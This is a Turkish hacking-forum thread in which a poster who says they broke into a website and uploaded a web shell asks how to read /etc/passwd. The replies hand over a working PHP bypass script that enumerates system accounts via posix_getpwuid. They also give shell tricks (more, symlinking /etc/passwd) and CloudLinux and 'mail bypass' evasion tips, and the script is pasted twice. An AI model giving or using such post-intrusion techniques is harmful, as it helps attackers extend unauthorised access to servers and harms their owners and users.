/etc/passwd okuyamıyorum

Arkadaşlar siteye girdim shell attım /etc/passwd okuyamıyorum ne yapmam gerek webroot shell yükledim /etc/passwd bölümü boş.

Arkadaşlar siteye girdim shell attım /etc/passwd okuyamıyorum ne yapmam gerek webroot shell yükledim /etc/passwd bölümü boş.

C1 cekmeyi dene olmaz ise cloudlinux bypassla readme yap etc/paswd okunur büyük ihtimalle.

Böyle durumlarda genelde posix_getpwuid fonksiyonu işi halleder.

kullanım: site.com/bypass.php?id=passwd

PHP:
<?php
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
}
?>

genel olarak bi çok script cat komutuyla geçer ve çoğu firma optimize yaparken bu komutları engeller sw geçme işi düşünme işidir sadece çekebilceğiniz 5-6 komut mevcut cgi shell açılıyorsa more less vs teker teker dene olmazsa bu sener yine cgi shellden more /etc/passwd > pw.txt olarak ln -s /etc/passwd > pw.txt olarak sürekli dene illaki gelir eğer gene olmadıysa shell üzerinden dizine gir litespeed yoksa girer yani direk shell den /etc gir passwd bulup edit bas gene okunur eğer cloud linux değilse.

eğer sunucu cloud linux ise mail bypass method ile çekebilirsin bunuda videolu eğitim seti olarak öncesinde forumda paylaşmıştım.
http://spyhackerz.com/forum/threads/orta-halli-videolu-eğitim-seti-1.3735/
bir sürü yolu var illaki çekersin çünkü her userin passwd dosyasında yetkisi ve hakkı vardır o passwd ya seve seve ya s*ke s*ke gelecek :D zamanında optimizasyon yaptıgımda baya uğraşıyordum engellemek için :)

Böyle durumlarda genelde posix_getpwuid fonksiyonu işi halleder.

kullanım: site.com/bypass.php?id=passwd

PHP:
<?php
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}